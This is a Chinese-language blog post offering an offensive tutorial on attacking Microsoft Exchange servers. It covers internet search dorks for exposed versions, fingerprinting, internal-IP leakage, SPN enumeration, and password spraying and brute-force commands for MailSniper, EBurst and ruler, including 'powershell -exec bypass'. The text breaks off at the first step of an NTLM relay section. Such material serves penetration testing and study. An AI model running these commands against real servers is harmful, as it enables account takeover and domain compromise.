<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="椿">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>椿</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">椿</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">椿</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/intimatep" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/intimatep" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/0.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title"></h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-03-09
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.7k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    11 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p><a name="Yy0Jj"></a></p>
<h3 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1.简介</h3><p>‘’’<br>:::info<br>Exchange的攻击方式，主要内容包括exchange快速了解、接口和协议、功能和服务、EXCHANGE信息搜集、版本确定、IP泄露、泄露exchange服务器信息、EXCHANGE 外围打点、EXCHANGE 后渗透、获取全局地址表、查找存在缺陷的用户邮箱权限委派、通过exchange用户组进行域提权、NTLM relay、OUTLOOK 命令执行、基本概念、基础应用、原理机制和需要注意的事项等。<br>:::<br>‘’’<br><a name="SkNEx"></a></p>
<h3 id="2-介绍"><a href="#2-介绍" class="headerlink" title="2.介绍"></a>2.介绍</h3><p>‘’’<br>:::info<br>本章讲解主要为Exchange服务器攻防，以及思路拓展但本人思路有限，在实战中遇到次数较少可能线上文章思路也会有总结，大佬勿喷可参与思路拓展本地搭建环境进行复盘，本章会介绍如何判断版本信息、常见CVE漏洞、邮件服务器爆破、LDAP协议利用等….后续有🐮的操作会跟进更新，致敬🫡<br>:::<br>‘’’<br><a name="P74Pc"></a></p>
<h3 id="3-搜索语法"><a href="#3-搜索语法" class="headerlink" title="3.搜索语法"></a>3.搜索语法</h3><p>‘’’<br>:::info<br>语法来自互联网（需要识别版本信息）：<br>microsoft exchange 2013： <br>app=”Microsoft-Exchange-2013”||app=”Microsoft-Exchange-Server-2013-CU21”||app=”Microsoft-Exchange-Server-2013-CU17”||app=”Microsoft-Exchange-Server-2013-CU23”||app=”Microsoft-Exchange-Server-2013-CU13”||app=”Microsoft-Exchange-Server-2013-CU22”||app=”Microsoft-Exchange-Server-2013-CU11”||app=”Microsoft-Exchange-Server-2013-CU2”||app=”Microsoft-Exchange-Server-2013-CU16”||app=”Microsoft-Exchange-Server-2013-CU19”||app=”Microsoft-Exchange-Server-2013-CU3”||app=”Microsoft-Exchange-Server-2013-CU18”||app=”Microsoft-Exchange-Server-2013-CU5”||app=”Microsoft-Exchange-Server-2013-CU20”||app=”Microsoft-Exchange-Server-2013-CU12”||app=”Microsoft-Exchange-Server-2013-CU15”||app=”Microsoft-Exchange-Server-2013-CU10”||app=”Microsoft-Exchange-Server-2013-CU9”||app=”Microsoft-Exchange-Server-2013-CU6”||app=”Microsoft-Exchange-Server-2013-CU7”||app=”Microsoft-Exchange-Server-2013-CU1”||app=”Microsoft-Exchange-Server-2013-CU14”||app=”Microsoft-Exchange-Server-2013-CU8”||app=”Microsoft-Exchange-Server-2013-RTM”||app=”Microsoft-Exchange-Server-2013-SP1”||app=”Microsoft-Exchange-2013” </p>
<p>microsoft exchange 2016： <br>app=”Microsoft-Exchange-Server-2016-CU19”||app=”Microsoft-Exchange-Server-2016-CU3”||app=”Microsoft-Exchange-Server-2016-CU12”||app=”Microsoft-Exchange-Server-2016-RTM”||app=”Microsoft-Exchange-Server-2016-CU7”||app=”Microsoft-Exchange-Server-2016-CU17”||app=”Microsoft-Exchange-Server-2016-CU2”||app=”Microsoft-Exchange-Server-2016-CU1”||app=”Microsoft-Exchange-Server-2016-CU14”||app=”Microsoft-Exchange-Server-2016-CU5”||app=”Microsoft-Exchange-Server-2016-CU11”||app=”Microsoft-Exchange-Server-2016-CU9”||app=”Microsoft-Exchange-Server-2016-CU16”||app=”Microsoft-Exchange-Server-2016-CU10”||app=”Microsoft-Exchange-Server-2016-CU6”||app=”Microsoft-Exchange-Server-2016-CU13”||app=”Microsoft-Exchange-Server-2016-CU18”||app=”Microsoft-Exchange-Server-2016-CU8”||app=”Microsoft-Exchange-Server-2016-CU4”||app=”Microsoft-Exchange-2016-POP3-server” </p>
<p>microsoft exchange 2019： <br>app=”Microsoft-Exchange-Server-2019-CU5”||app=”Microsoft-Exchange-Server-2019-CU3”||app=”Microsoft-Exchange-Server-2019-Preview”||app=”Microsoft-Exchange-Server-2019-CU8”||app=”Microsoft-Exchange-Server-2019-CU1”||app=”Microsoft-Exchange-Server-2019-CU7”||app=”Microsoft-Exchange-Server-2019-CU2”||app=”Microsoft-Exchange-Server-2019-CU6”||app=”Microsoft-Exchange-Server-2019-RTM”||app=”Microsoft-Exchange-Server-2019-CU4” </p>
<p>microsoft exchange 2010： <br>app=”Microsoft-Exchange-2010-POP3-server-version-03.1”||app=”Microsoft-Exchange-Server-2010”<br>:::<br>‘’’<br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677567580158-9c425732-47e2-4b38-9626-0788c2aafe8f.png#averageHue=%23e3c820&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=468&amp;id=ufb2266e8&amp;name=image.png&amp;originHeight=936&amp;originWidth=2154&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=352458&amp;status=done&amp;style=none&amp;taskId=u3d122bc5-cf55-4b5f-888d-eab1a7330e7&amp;title=&amp;width=1077" alt="image.png"><br><a name="Puuvz"></a></p>
<h3 id="4-Exchange-介绍"><a href="#4-Exchange-介绍" class="headerlink" title="4.Exchange 介绍"></a>4.Exchange 介绍</h3><p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677569003390-37e37e2e-3e2a-4719-863e-ab4d579eee25.png#averageHue=%23fefefe&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=307&amp;id=u7c4021dd&amp;name=image.png&amp;originHeight=614&amp;originWidth=1672&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=182445&amp;status=done&amp;style=none&amp;taskId=u6f563eb3-bb8b-48d0-9b20-eaef053f193&amp;title=&amp;width=836" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677568984736-7094445e-5d4a-4619-8ad2-49606257b65a.png#averageHue=%23edeeef&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=521&amp;id=u55571480&amp;name=image.png&amp;originHeight=1042&amp;originWidth=1586&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=274605&amp;status=done&amp;style=none&amp;taskId=u8c6709ff-2801-4719-bc85-096f8431ea1&amp;title=&amp;width=793" alt="image.png"><br><a name="U4KDi"></a></p>
<h3 id="5-泄漏与识别"><a href="#5-泄漏与识别" class="headerlink" title="5.泄漏与识别"></a>5.泄漏与识别</h3><p>到这里恭喜你已经步入渗透第一步，遇到Exchange 服务器首先要了解他的版本信息与服务器信息 这里可以通过一些扫描和查看前端进行查看。<br><img src="https://cdn.nlark.com/yuque/0/2023/jpeg/2738075/1677641226041-ad48b922-52e8-49ae-ba51-eb1dd8edb225.jpeg#averageHue=%23eeeeee&amp;clientId=uc87b65df-1628-4&amp;from=ui&amp;id=u3712e769&amp;name=wp_editor_md_17d0a6de440a6b14191cdcb75783036b.jpeg&amp;originHeight=4304&amp;originWidth=4300&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=829536&amp;status=done&amp;style=none&amp;taskId=u84a90ea3-0b21-4a17-b949-659ae6f5e27&amp;title=" alt="wp_editor_md_17d0a6de440a6b14191cdcb75783036b.jpeg"><br><a name="NKglO"></a></p>
<h4 id="5-1-查看版本号"><a href="#5-1-查看版本号" class="headerlink" title="5.1 查看版本号"></a>5.1 查看版本号</h4><p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677569333017-184eefd5-591d-4980-b707-ac87ebba3697.png#averageHue=%23bfd8ec&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=464&amp;id=u4d7e2ae9&amp;name=image.png&amp;originHeight=928&amp;originWidth=2310&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=74503&amp;status=done&amp;style=none&amp;taskId=ud93b839c-8874-49f1-bd89-ddbaf7bb1d8&amp;title=&amp;width=1155" alt="image.png"><br>点击查看源码 根据源码中版本号进行对比版本信息<br><a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&amp;view=exchserver-2019#exchange-server-2019">https://learn.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&amp;view=exchserver-2019#exchange-server-2019</a><br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677569435472-b8d4de29-b5bc-4a4a-8319-a56d2d7bc4c8.png#averageHue=%23f3f3f3&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=324&amp;id=uadc85823&amp;name=image.png&amp;originHeight=648&amp;originWidth=1988&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=169933&amp;status=done&amp;style=none&amp;taskId=u154c9c0f-5d40-4b28-bf9a-7c2fc7ab13e&amp;title=&amp;width=994" alt="image.png"><br><a name="n2VPU"></a></p>
<h4 id="5-2-nmap扫描查看版本信息"><a href="#5-2-nmap扫描查看版本信息" class="headerlink" title="5.2 nmap扫描查看版本信息"></a>5.2 nmap扫描查看版本信息</h4><p>可以通过工具进行直接扫描获取版本信息，但容易留下大量扫描记录<br>扫描命令：nmap -A -O -sV -v 192.168.159.128 <br>扫描命令：nmap host  -p 443 –script http-ntlm-info –script-args http-ntlm-info.root=/rpc/rpcproxy.dll -Pn<br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677569565494-145b2610-05d7-416f-b219-31daef363686.png#averageHue=%2328313e&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=614&amp;id=u0b400582&amp;name=image.png&amp;originHeight=1228&amp;originWidth=1588&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=972687&amp;status=done&amp;style=none&amp;taskId=u9836a867-da8d-4fbb-b5cb-4becfb4cf05&amp;title=&amp;width=794" alt="image.png"><br><a name="hAuOn"></a></p>
<h4 id="5-3-内网IP-泄漏"><a href="#5-3-内网IP-泄漏" class="headerlink" title="5.3 内网IP 泄漏"></a>5.3 内网IP 泄漏</h4><p>抓包以下接口包，将HTTP版本改为1.0，并删除HOST头，就会暴露exchange ip，有时会暴露内网IP，当然如果想方便一些可以通过msf进行扫描也可以。</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">/Microsoft-Server-ActiveSync/default.eas</span><br><span class="line">/Microsoft-Server-ActiveSync</span><br><span class="line">/Autodiscover/Autodiscover.xml</span><br><span class="line">/Autodiscover</span><br><span class="line">/Exchange</span><br><span class="line">/Rpc</span><br><span class="line">/EWS/Exchange.asmx</span><br><span class="line">/EWS/Services.wsdl</span><br><span class="line">/EWS</span><br><span class="line">/ecp</span><br><span class="line">/OAB</span><br><span class="line">/OWA</span><br><span class="line">/aspnet_client</span><br><span class="line">/PowerShell</span><br></pre></td></tr></tbody></table></figure>
<p><a name="zOXiK"></a></p>
<h4 id="5-4-在内网中通过Spn扫描Exchange"><a href="#5-4-在内网中通过Spn扫描Exchange" class="headerlink" title="5.4 在内网中通过Spn扫描Exchange"></a>5.4 在内网中通过Spn扫描Exchange</h4><p>命令 ： setspn -Q IMAP/* | findstr “exchange”<br>命令 ： setspn.exe -T 域名.com -F -Q <em>/</em>  查询所有服务<br>命令 ： setspn -q <em>/</em></p>
<p>服务主体名称（SPN）是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。服务主体名称是服务实例（可以理解为一个服务，比如HTTP、MSSQL和EXCHANGE）的唯一标识符。Kerberos身份验证将<strong>使用SPN将服务实例与服务登录账户相关联。</strong>SPN是启用Kerberos的服务所注册的便于KDC查找的服务名称，这些SPN名称信息被记录在活动目录数据库中，只要服务安装完成，这些SPN名称就已经存在除非卸载或者删除，SPN名称查找与当前服务是否启动没有关系（如Exchange服务器的IMAP/POP等部分服务器默认是不启动的，但其SPN名称依然存在)<br><a name="vWwuu"></a></p>
<h3 id="6-登录框渗透"><a href="#6-登录框渗透" class="headerlink" title="6.登录框渗透"></a>6.登录框渗透</h3><p><a name="SgsVi"></a></p>
<h4 id="6-1-无凭证爆破"><a href="#6-1-无凭证爆破" class="headerlink" title="6.1 无凭证爆破"></a>6.1 无凭证爆破</h4><p>在企业域环境中，Exchange与域服务集合，域用户账号密码就是Exchange邮箱的账户密码。如果通过暴力手段成功获取了用户邮箱密码，在通常情况下也就间接获得了域用户密码。<br>Autodiscover自动发现服务使用Autodiscover.xml配置文件来对用户进行自动设置，获取该自动配置需要用户认证。<br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677570103753-3b0255ff-d224-4787-a0e8-41a2753080f9.png#averageHue=%23fdfdfd&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=316&amp;id=u99c81300&amp;name=image.png&amp;originHeight=632&amp;originWidth=2366&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=119063&amp;status=done&amp;style=none&amp;taskId=u824710be-980d-4b3b-bdaa-1aa57679e03&amp;title=&amp;width=1183" alt="image.png"><br>当然这里需要利用工具 这里挑选几款网上爆破使用率较高的工具<br><a target="_blank" rel="noopener" href="https://github.com/grayddq/EBurst">https://github.com/grayddq/EBurst</a> （python）<br>:::info<br>使用命令： python EBurst.py -L users.txt -p 123456abc -d mail.xxx.com<br>:::<br><a target="_blank" rel="noopener" href="https://github.com/sensepost/ruler">https://github.com/sensepost/ruler</a> （exe）<br><a target="_blank" rel="noopener" href="https://github.com/dafthack/MailSniper">https://github.com/dafthack/MailSniper</a> (ps1)</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">对OWA进行爆破</span><br><span class="line">Import-Module .MailSniper.ps1</span><br><span class="line">Invoke-PasswordSprayOWA -ExchHostname OWAHOST -UserList .user.txt -Password password -Threads <span class="number">1</span> -Domain domainname -OutFile out.txt -Verbose </span><br><span class="line"></span><br><span class="line">对EWS进行爆破</span><br><span class="line">Invoke-PasswordSprayEWS -ExchHostname EWSHOST -UserList .user.txt -Password password -Threads <span class="number">1</span> -Domain domainname -OutFile out.txt -Verbose</span><br></pre></td></tr></tbody></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677570382231-a8b64866-4c44-42d4-88e0-169e8415f499.png#averageHue=%231b2e4a&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=292&amp;id=uff5787e1&amp;name=image.png&amp;originHeight=584&amp;originWidth=1620&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=327957&amp;status=done&amp;style=none&amp;taskId=ua0aa7349-f788-4c6e-bab7-468de67a387&amp;title=&amp;width=810" alt="image.png"><br>在Github中我们也看到 工具在认证之后可以通过检索的方式抓取到邮箱<br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677570589730-0762f463-6d98-4d52-b823-8a208be1a7a2.png#averageHue=%23e9eaeb&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=297&amp;id=u38a52784&amp;name=image.png&amp;originHeight=594&amp;originWidth=1714&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=218045&amp;status=done&amp;style=none&amp;taskId=ubef488ee-b9f9-4d25-b261-7763a3070e7&amp;title=&amp;width=857" alt="image.png"><br><a name="FXosW"></a></p>
<h4 id="6-2-存在凭证的情况"><a href="#6-2-存在凭证的情况" class="headerlink" title="6.2 存在凭证的情况"></a>6.2 存在凭证的情况</h4><p>当我们获取凭证之后可以进行信息收集以及邮箱收集方便后续爆破或钓鱼使用。</p>
<ul>
<li>掌握其中一个用户邮箱的账户密码，并可以登录outlook</li>
<li>在域用户登录之后才能执行该ps1</li>
</ul>
<p>如我们登录了一个普通域用户，并且获取了一个邮箱账号和密码(demo demo.com)可以登录outlook<br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677573024606-37e5e97d-4038-4b05-9999-887fce8a5048.png#averageHue=%23fdfdfd&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=321&amp;id=uc596ff2a&amp;name=image.png&amp;originHeight=642&amp;originWidth=1820&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=141628&amp;status=done&amp;style=none&amp;taskId=uda9ff191-7bd5-49c4-b433-54e134f5926&amp;title=&amp;width=910" alt="image.png"></p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">powershell -<span class="built_in">exec</span> bypass</span><br><span class="line">Import-Module .\MailSniper.ps1</span><br><span class="line">Get-GlobalAddressList -ExchHostname outlook地址   -UserName 域用户名 -Password 已知的邮箱密码 -OutFile 导出结果.txt</span><br><span class="line">Get-GlobalAddressList -ExchHostname mail.test.lab -UserName demo -Password demo.com</span><br><span class="line"><span class="comment"># -ExchHostname：ping -a exchange服务器ip -&gt; 得到主机名 -&gt; 主机名.域名（mail.test.lab）</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677573069750-a0ad9cf4-3006-41d7-afdf-4cc285972d76.png#averageHue=%23090909&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=375&amp;id=u560ce4e5&amp;name=image.png&amp;originHeight=750&amp;originWidth=1810&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=250294&amp;status=done&amp;style=none&amp;taskId=uf1764856-290c-46ed-b0b5-2965c32a665&amp;title=&amp;width=905" alt="image.png"><br><a name="Rq6Dn"></a></p>
<h5 id="6-2-1-另外附贴一份工具-枚举工具"><a href="#6-2-1-另外附贴一份工具-枚举工具" class="headerlink" title="6.2.1 另外附贴一份工具 枚举工具"></a>6.2.1 另外附贴一份工具 枚举工具</h5><figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ruler-win64.exe --domain test.lab -k brute --users userlist.txt --passwords <span class="keyword">pass</span>.txt --delay <span class="number">0</span> --threads <span class="number">10</span> -v</span><br></pre></td></tr></tbody></table></figure>
<p>参考：<a target="_blank" rel="noopener" href="https://www.redteam101.tech/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell">https://www.redteam101.tech/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell</a><br><a name="pIYXe"></a></p>
<h3 id="7-NTLM中继"><a href="#7-NTLM中继" class="headerlink" title="7.NTLM中继"></a>7.NTLM中继</h3><p>NTLM中继攻击，是指攻击者在NTLM交互过程中充当中间人的角色，在请求认证的客户端与服务端之间传递交互信息，将客户端提交的Net-NTLM哈希截获并随后将其重放到认证目标方，以中继重放的中间人攻击实现无需破解用户名密码而获取权限。</p>
<ol>
<li>先以test用户登录，给administrator用户发一封邮件。</li>
</ol>
